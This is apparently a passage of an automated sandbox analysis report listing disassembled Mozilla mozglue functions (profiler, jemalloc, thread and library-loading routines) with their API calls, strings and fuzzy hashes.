                                                        Function 6C10EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                          • Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10EE60
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EE6D
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EE92
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C10EEA5
                                                        • CloseHandle.KERNEL32(?), ref: 6C10EEB4
                                                        • free.MOZGLUE(00000000), ref: 6C10EEBB
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10EEC7
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10EECF
                                                          • Part of subcall function 6C10DE60: GetCurrentThreadId.KERNEL32 ref: 6C10DE73
                                                          • Part of subcall function 6C10DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C0D4A68), ref: 6C10DE7B
                                                          • Part of subcall function 6C10DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C0D4A68), ref: 6C10DEB8
                                                          • Part of subcall function 6C10DE60: free.MOZGLUE(00000000,?,6C0D4A68), ref: 6C10DEFE
                                                          • Part of subcall function 6C10DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C10DF38
                                                          • Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
                                                          • Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10EF1E
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EF2B
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EF59
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10EFB0
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EFBD
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EFE1
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10EFF8
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F000
                                                          • Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
                                                          • Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508
                                                        • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C10F02F
                                                          • Part of subcall function 6C10F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C10F09B
                                                          • Part of subcall function 6C10F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C10F0AC
                                                          • Part of subcall function 6C10F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C10F0BE
                                                        Strings
                                                        • [I %d/%d] profiler_stop, xrefs: 6C10EED7
                                                        • [I %d/%d] profiler_pause, xrefs: 6C10F008
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                        • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                        • API String ID: 16519850-1833026159
                                                        • Opcode ID: fbdcf23ffafb974f5053e95694deabdb89ecf1d7e75746c22cc3cfe6112e705a
                                                        • Instruction ID: f413f991ee5cb0b98af912ead777e678ef87729e68da7519e93baeee340601ff
                                                        • Opcode Fuzzy Hash: fbdcf23ffafb974f5053e95694deabdb89ecf1d7e75746c22cc3cfe6112e705a
                                                        • Instruction Fuzzy Hash: C4513635704614DFDB00BB65D408BAA37B4EF4632CF18C669E93583B80DF745906DBA2
                                                        Function 6C0FD010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14E804), ref: 6C0FD047
                                                        • GetSystemInfo.KERNEL32(?), ref: 6C0FD093
                                                        • __Init_thread_footer.LIBCMT ref: 6C0FD0A6
                                                        • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C14E810,00000040), ref: 6C0FD0D0
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C14E7B8,00001388), ref: 6C0FD147
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C14E744,00001388), ref: 6C0FD162
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C14E784,00001388), ref: 6C0FD18D
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C14E7DC,00001388), ref: 6C0FD1B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                        • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                        • API String ID: 2957312145-326518326
                                                        • Opcode ID: ffa778f2f05664d0f6db56388536fce7b5acefbaa952b7da36c4b3a25518420d
                                                        • Instruction ID: 22590d175af55ae49e969902f8e31647f3a514998701ea4a588356263d6e1785
                                                        • Opcode Fuzzy Hash: ffa778f2f05664d0f6db56388536fce7b5acefbaa952b7da36c4b3a25518420d
                                                        • Instruction Fuzzy Hash: F281EE70B003019BEB00EF68C854B69BBF5FF5672DF108129EA2197B80D7759A82DBD1
                                                        Function 6C10FAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10FADC
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10FAE9
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10FB31
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10FB43
                                                        • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C10FBF6
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10FC50
                                                        Strings
                                                        • [D %d/%d] profiler_unregister_thread: %s, xrefs: 6C10FC94
                                                        • [I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6C10FD15
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
                                                        • String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
                                                        • API String ID: 2101194506-3679350629
                                                        • Opcode ID: 51c6b18aa5c22fae5b653421bd5e6b2ea4c69e60d215b32c9cd82f75c022eee1
                                                        • Instruction ID: 2e41f7ed113782935be2d51f9f3650370c45fbf9f5b8ddfdcc1c60402215da28
                                                        • Opcode Fuzzy Hash: 51c6b18aa5c22fae5b653421bd5e6b2ea4c69e60d215b32c9cd82f75c022eee1
                                                        • Instruction Fuzzy Hash: C271F175B047008FD710EF29C546B6AB7F0FF89308F058569E86587B51EF30A845CB95
                                                        Function 6C0D5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D5E9D
                                                          • Part of subcall function 6C0E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5B85
                                                          • Part of subcall function 6C0E5B50: EnterCriticalSection.KERNEL32(6C14F688,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5B90
                                                          • Part of subcall function 6C0E5B50: LeaveCriticalSection.KERNEL32(6C14F688,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5BD8
                                                          • Part of subcall function 6C0E5B50: GetTickCount64.KERNEL32 ref: 6C0E5BE4
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C0D5EAB
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C0D5EB8
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D5ECF
                                                        • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C0D6017
                                                          • Part of subcall function 6C0C4310: moz_xmalloc.MOZGLUE(00000010,?,6C0C42D2), ref: 6C0C436A
                                                          • Part of subcall function 6C0C4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0C42D2), ref: 6C0C4387
                                                        • moz_xmalloc.MOZGLUE(00000004), ref: 6C0D5F47
                                                        • GetCurrentProcess.KERNEL32 ref: 6C0D5F53
                                                        • GetCurrentThread.KERNEL32 ref: 6C0D5F5C
                                                        • GetCurrentProcess.KERNEL32 ref: 6C0D5F66
                                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C0D5F7E
                                                        • moz_xmalloc.MOZGLUE(00000024), ref: 6C0D5F27
                                                          • Part of subcall function 6C0DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0DCAA2
                                                        • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0D55E1), ref: 6C0D5E8C
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0D55E1), ref: 6C0D605D
                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0D55E1), ref: 6C0D60CC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                        • String ID: GeckoMain
                                                        • API String ID: 3711609982-966795396
                                                        • Opcode ID: a1b6f6131ca0dc471c7abbfad2c165f7634197086cae399e4c5c8a2519e32962
                                                        • Instruction ID: ba026a842505e5aa89f802f8d95719b1f2f77636623f89400be51906b5e0e070
                                                        • Opcode Fuzzy Hash: a1b6f6131ca0dc471c7abbfad2c165f7634197086cae399e4c5c8a2519e32962
                                                        • Instruction Fuzzy Hash: 8B718CB46047409FD710DF28C480B6ABBF0BF99308F55896DE9968BB52D731B948CB92
                                                        Function 6C0D9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0C31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C0C3217
                                                          • Part of subcall function 6C0C31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C0C3236
                                                          • Part of subcall function 6C0C31C0: FreeLibrary.KERNEL32 ref: 6C0C324B
                                                          • Part of subcall function 6C0C31C0: __Init_thread_footer.LIBCMT ref: 6C0C3260
                                                          • Part of subcall function 6C0C31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C0C327F
                                                          • Part of subcall function 6C0C31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0C328E
                                                          • Part of subcall function 6C0C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0C32AB
                                                          • Part of subcall function 6C0C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0C32D1
                                                          • Part of subcall function 6C0C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0C32E5
                                                          • Part of subcall function 6C0C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0C32F7
                                                        • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C0D9675
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D9697
                                                        • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0D96E8
                                                        • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C0D9707
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D971F
                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0D9773
                                                        • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0D97B7
                                                        • FreeLibrary.KERNEL32 ref: 6C0D97D0
                                                        • FreeLibrary.KERNEL32 ref: 6C0D97EB
                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0D9824
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                        • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                        • API String ID: 3361784254-3880535382
                                                        • Opcode ID: ddd28c15f9ab8f5fdb016f8be7f02a76b32abc713fda61e481f6ae5ac096d465
                                                        • Instruction ID: 69e67da0b87e93e913ba4166ceb1436938245ef88176ef8661594fd30bb78037
                                                        • Opcode Fuzzy Hash: ddd28c15f9ab8f5fdb016f8be7f02a76b32abc713fda61e481f6ae5ac096d465
                                                        • Instruction Fuzzy Hash: E061F1B1600301AFDF00EFA9D898B9A7BF5EB4A31DF11C129ED2593780DB34A944DB91
                                                        Function 6C0C3AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(6C14E768,?,00003000,00000004), ref: 6C0C3AC5
                                                        • LeaveCriticalSection.KERNEL32(6C14E768,?,00003000,00000004), ref: 6C0C3AE5
                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6C0C3AFB
                                                        • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C0C3B57
                                                        • EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0C3B81
                                                        • LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C3BA3
                                                        • EnterCriticalSection.KERNEL32(6C14E7B8), ref: 6C0C3BAE
                                                        • LeaveCriticalSection.KERNEL32(6C14E7B8), ref: 6C0C3C74
                                                        • EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0C3C8B
                                                        • LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C3C9F
                                                        • LeaveCriticalSection.KERNEL32(6C14E7B8), ref: 6C0C3D5C
                                                        • EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0C3D67
                                                        • LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C3D8A
                                                          • Part of subcall function 6C100D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C0C3DEF), ref: 6C100D71
                                                          • Part of subcall function 6C100D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C0C3DEF), ref: 6C100D84
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
                                                        • API String ID: 2380290044-2272602182
                                                        • Opcode ID: cf109ad462b650bf10b9df4c696fb1a04600ff8bff5c0309ed1e6110b0efe801
                                                        • Instruction ID: c37dea4452dde09bccfcb9f7070f70fd1df3dc3a05446646192d338f48922cf6
                                                        • Opcode Fuzzy Hash: cf109ad462b650bf10b9df4c696fb1a04600ff8bff5c0309ed1e6110b0efe801
                                                        • Instruction Fuzzy Hash: 8D91A0717106058BDB04DF68C4C4BAEB7F2BF89329F248528E9159BB81D771E901DBD2
                                                        Function 6C0D7FD0 Relevance: 24.2, APIs: 16, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C0D8007
                                                        • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C0D801D
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C0D802B
                                                        • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C0D803D
                                                        • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C0D808D
                                                          • Part of subcall function 6C0DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0DCAA2
                                                        • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C0D809B
                                                        • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C0D80B9
                                                        • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C0D80DF
                                                        • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D80ED
                                                        • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D80FB
                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D810D
                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C0D8133
                                                        • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C0D8149
                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C0D8167
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C0D817C
                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D8199
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                        • String ID:
                                                        • API String ID: 2721933968-0
                                                        • Opcode ID: 5ec639a72b2d22ae649d0ee22d37c51411f584f04fd329c8ef170c2fe492e071
                                                        • Instruction ID: d9ef765a6d64af1f1d0848ccc62bb4b833226021ea332cf2ed8b3ce57baf226e
                                                        • Opcode Fuzzy Hash: 5ec639a72b2d22ae649d0ee22d37c51411f584f04fd329c8ef170c2fe492e071
                                                        • Instruction Fuzzy Hash: 315196B5E002145BDB00DBA9DC84BEFB7F9AF89668F150225E815E7741E730B9088BA1
                                                        Function 6C0D11B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C0D1213
                                                        • toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C0D1285
                                                        • memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C0D12B9
                                                        • memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C0D1327
                                                        Strings
                                                        • TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C0D12AD
                                                        • MZx, xrefs: 6C0D11E1
                                                        • CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C0D131B
                                                        • Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C0D120D
                                                        • &, xrefs: 6C0D126B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memcpy$toupper
                                                        • String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
                                                        • API String ID: 403083179-3658087426
                                                        • Opcode ID: d8eb0906f5541dcddca7aa75e6dea7b4e3d61ffca01d2488e551be0a27cc5cb1
                                                        • Instruction ID: 362a1b3df28ca7157de48183fb19b85e583f52356ff9808528f1d43eae4e1c41
                                                        • Opcode Fuzzy Hash: d8eb0906f5541dcddca7aa75e6dea7b4e3d61ffca01d2488e551be0a27cc5cb1
                                                        • Instruction Fuzzy Hash: F271A171E057688ADB209FB4C804BDEB7F5BF4931DF05065AD449A3B40DB34BA89CB92
                                                        Function 6C0C31C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C0C3217
                                                        • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C0C3236
                                                        • FreeLibrary.KERNEL32 ref: 6C0C324B
                                                        • __Init_thread_footer.LIBCMT ref: 6C0C3260
                                                        • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C0C327F
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0C328E
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0C32AB
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0C32D1
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0C32E5
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0C32F7
